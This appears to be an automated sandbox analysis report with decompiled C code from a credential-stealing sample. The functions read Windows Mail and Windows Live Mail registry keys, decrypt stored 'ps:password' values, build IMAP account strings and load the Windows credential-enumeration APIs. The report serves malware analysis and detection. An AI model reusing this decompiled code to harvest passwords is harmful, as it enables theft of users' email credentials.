                                                                                • strlen.MSVCRT ref: 0041054C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                • memset.MSVCRT ref: 004105A8
                                                                                • memset.MSVCRT ref: 004105C5
                                                                                • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                  • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                Strings
                                                                                • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                • Salt, xrefs: 00410621
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                • API String ID: 1673043434-2687544566
                                                                                • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040CBA7, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L00411612();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040D438(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L004115B2();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L004115B2();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L00411612();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                                                0x0040cbb2
                                                                                0x0040cbbb
                                                                                0x0040cbbd
                                                                                0x0040cbc0
                                                                                0x0040cbcc
                                                                                0x0040cbc2
                                                                                0x0040cbc7
                                                                                0x0040cbc7
                                                                                0x0040cbce
                                                                                0x0040cbd0
                                                                                0x0040cbd5
                                                                                0x0040cbd6
                                                                                0x0040cbdb
                                                                                0x0040cbe0
                                                                                0x0040cc0b
                                                                                0x0040cc11
                                                                                0x0040cc14
                                                                                0x0040cc23
                                                                                0x0040cc32
                                                                                0x0040cc3d
                                                                                0x0040cc44
                                                                                0x0040cc53
                                                                                0x0040cc5a
                                                                                0x0040cc5f
                                                                                0x0040cc66
                                                                                0x0040cc79
                                                                                0x0040cc7e
                                                                                0x0040cc85
                                                                                0x0040cc98
                                                                                0x0040cc9d
                                                                                0x0040cc9f
                                                                                0x0040cca5
                                                                                0x0040ccac
                                                                                0x0040ccac
                                                                                0x0040ccaf
                                                                                0x0040ccb0
                                                                                0x0040ccb6
                                                                                0x0040ccb7
                                                                                0x0040ccc0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ccc2
                                                                                0x0040ccc7
                                                                                0x0040ccce
                                                                                0x0040ccce
                                                                                0x0040ccd1
                                                                                0x0040ccd2
                                                                                0x0040ccd8
                                                                                0x0040ccd9
                                                                                0x0040cce2
                                                                                0x0040ccf4
                                                                                0x0040ccf4
                                                                                0x0040ccf7
                                                                                0x0040cd03
                                                                                0x0040cc21
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cd09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cce4
                                                                                0x0040ccf2
                                                                                0x0040cd17
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ccf2
                                                                                0x0040cc23
                                                                                0x0040cbe2
                                                                                0x0040cbe5
                                                                                0x0040cbf1
                                                                                0x0040cbe7
                                                                                0x0040cbec
                                                                                0x0040cbec
                                                                                0x0040cbf3
                                                                                0x0040cbf5
                                                                                0x0040cbfa
                                                                                0x0040cbfb
                                                                                0x0040cc00
                                                                                0x0040cc05
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cc05
                                                                                0x0040cd1e
                                                                                0x0040cd24

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 4281260487-2229823034
                                                                                • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040CBA5, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L00411612();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040D438(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L004115B2();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L004115B2();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L00411612();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                                                0x0040cbaa
                                                                                0x0040cbb2
                                                                                0x0040cbbb
                                                                                0x0040cbbd
                                                                                0x0040cbc0
                                                                                0x0040cbcc
                                                                                0x0040cbc2
                                                                                0x0040cbc7
                                                                                0x0040cbc7
                                                                                0x0040cbce
                                                                                0x0040cbd0
                                                                                0x0040cbd5
                                                                                0x0040cbd6
                                                                                0x0040cbdb
                                                                                0x0040cbe0
                                                                                0x0040cc0b
                                                                                0x0040cc11
                                                                                0x0040cc14
                                                                                0x0040cc23
                                                                                0x0040cc32
                                                                                0x0040cc3d
                                                                                0x0040cc44
                                                                                0x0040cc53
                                                                                0x0040cc5a
                                                                                0x0040cc5f
                                                                                0x0040cc66
                                                                                0x0040cc79
                                                                                0x0040cc7e
                                                                                0x0040cc85
                                                                                0x0040cc98
                                                                                0x0040cc9d
                                                                                0x0040cc9f
                                                                                0x0040cca5
                                                                                0x0040ccac
                                                                                0x0040ccac
                                                                                0x0040ccaf
                                                                                0x0040ccb0
                                                                                0x0040ccb6
                                                                                0x0040ccb7
                                                                                0x0040ccc0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ccc2
                                                                                0x0040ccc7
                                                                                0x0040ccce
                                                                                0x0040ccce
                                                                                0x0040ccd1
                                                                                0x0040ccd2
                                                                                0x0040ccd8
                                                                                0x0040ccd9
                                                                                0x0040cce2
                                                                                0x0040ccf4
                                                                                0x0040ccf4
                                                                                0x0040ccf7
                                                                                0x0040cd03
                                                                                0x0040cc21
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cd09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cce4
                                                                                0x0040ccf2
                                                                                0x0040cd17
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ccf2
                                                                                0x0040cc23
                                                                                0x0040cbe2
                                                                                0x0040cbe5
                                                                                0x0040cbf1
                                                                                0x0040cbe7
                                                                                0x0040cbec
                                                                                0x0040cbec
                                                                                0x0040cbf3
                                                                                0x0040cbf5
                                                                                0x0040cbfa
                                                                                0x0040cbfb
                                                                                0x0040cc00
                                                                                0x0040cc05
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cc05
                                                                                0x0040cd1d
                                                                                0x0040cd24

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 2822975062-2229823034
                                                                                • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 56%
                                                                                			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                                0x0040d703
                                                                                0x0040d71a
                                                                                0x0040d725
                                                                                0x0040d729
                                                                                0x0040d862
                                                                                0x0040d862
                                                                                0x0040d735
                                                                                0x0040d743
                                                                                0x0040d74b
                                                                                0x0040d752
                                                                                0x0040d753
                                                                                0x0040d756
                                                                                0x0040d844
                                                                                0x0040d774
                                                                                0x0040d792
                                                                                0x0040d7a1
                                                                                0x0040d7aa
                                                                                0x0040d7b3
                                                                                0x0040d7b9
                                                                                0x0040d7bf
                                                                                0x0040d7db
                                                                                0x0040d7e4
                                                                                0x0040d7ea
                                                                                0x0040d7f1
                                                                                0x0040d7f8
                                                                                0x0040d812
                                                                                0x0040d820
                                                                                0x0040d825
                                                                                0x0040d82b
                                                                                0x0040d82b
                                                                                0x0040d7db
                                                                                0x0040d830
                                                                                0x0040d830
                                                                                0x0040d836
                                                                                0x0040d839
                                                                                0x0040d840
                                                                                0x0040d841
                                                                                0x0040d841
                                                                                0x00000000

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                • memset.MSVCRT ref: 0040D743
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                • API String ID: 551151806-1288872324
                                                                                • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 56%
                                                                                			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                                0x004080a3
                                                                                0x004080a3
                                                                                0x004080ab
                                                                                0x004080b0
                                                                                0x004080b5
                                                                                0x004080fb
                                                                                0x004080ff
                                                                                0x00408105
                                                                                0x0040810e
                                                                                0x00408110
                                                                                0x00408126
                                                                                0x00408126
                                                                                0x00408134
                                                                                0x00408155
                                                                                0x0040815f
                                                                                0x00408165
                                                                                0x00408176
                                                                                0x0040817c
                                                                                0x00408182
                                                                                0x00408190
                                                                                0x00408196
                                                                                0x0040819e
                                                                                0x004081a5
                                                                                0x00408112
                                                                                0x00408120
                                                                                0x00408120
                                                                                0x00408122
                                                                                0x00408124
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408114
                                                                                0x00408117
                                                                                0x0040811d
                                                                                0x0040811d
                                                                                0x00000000
                                                                                0x0040811d
                                                                                0x00000000
                                                                                0x00408117
                                                                                0x00000000
                                                                                0x00408120
                                                                                0x004081ac
                                                                                0x004081ac
                                                                                0x004080b7
                                                                                0x004080c4
                                                                                0x004080d2
                                                                                0x004080d8
                                                                                0x004080df
                                                                                0x004080e1
                                                                                0x004080e3
                                                                                0x004080e4
                                                                                0x004080e7
                                                                                0x004080f0
                                                                                0x004080f0
                                                                                0x004081b2

                                                                                APIs
                                                                                • sprintf.MSVCRT ref: 004080C4
                                                                                • LoadMenuA.USER32 ref: 004080D2
                                                                                  • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                  • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                  • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                  • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                • sprintf.MSVCRT ref: 00408134
                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                • memset.MSVCRT ref: 00408165
                                                                                • GetWindowTextA.USER32 ref: 00408176
                                                                                • EnumChildWindows.USER32 ref: 0040819E
                                                                                • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                • API String ID: 3259144588-3822380221
                                                                                • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                0x0040e05d
                                                                                0x0040e0d9
                                                                                0x0040e0d9
                                                                                0x0040e065
                                                                                0x0040e06b
                                                                                0x0040e06f
                                                                                0x0040e0d8
                                                                                0x00000000
                                                                                0x0040e0d8
                                                                                0x0040e07e
                                                                                0x0040e082
                                                                                0x0040e087
                                                                                0x0040e08f
                                                                                0x0040e093
                                                                                0x0040e098
                                                                                0x0040e0a0
                                                                                0x0040e0a4
                                                                                0x0040e0a9
                                                                                0x0040e0b1
                                                                                0x0040e0b5
                                                                                0x0040e0ba
                                                                                0x0040e0c2
                                                                                0x0040e0c6
                                                                                0x0040e0cb
                                                                                0x0040e0cd
                                                                                0x0040e0cd
                                                                                0x0040e0cb
                                                                                0x0040e0ba
                                                                                0x0040e0a9
                                                                                0x0040e098
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                • API String ID: 667068680-3953557276
                                                                                • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404647, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                                0x00404648
                                                                                0x0040464a
                                                                                0x00404654
                                                                                0x0040465c
                                                                                0x0040465e
                                                                                0x00404676
                                                                                0x00404682
                                                                                0x0040468e
                                                                                0x0040469a
                                                                                0x004046a3
                                                                                0x004046a7
                                                                                0x004046b8
                                                                                0x004046af
                                                                                0x004046af
                                                                                0x004046af
                                                                                0x004046a7
                                                                                0x004046c1

                                                                                APIs
                                                                                  • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,73AFF420), ref: 004046C9
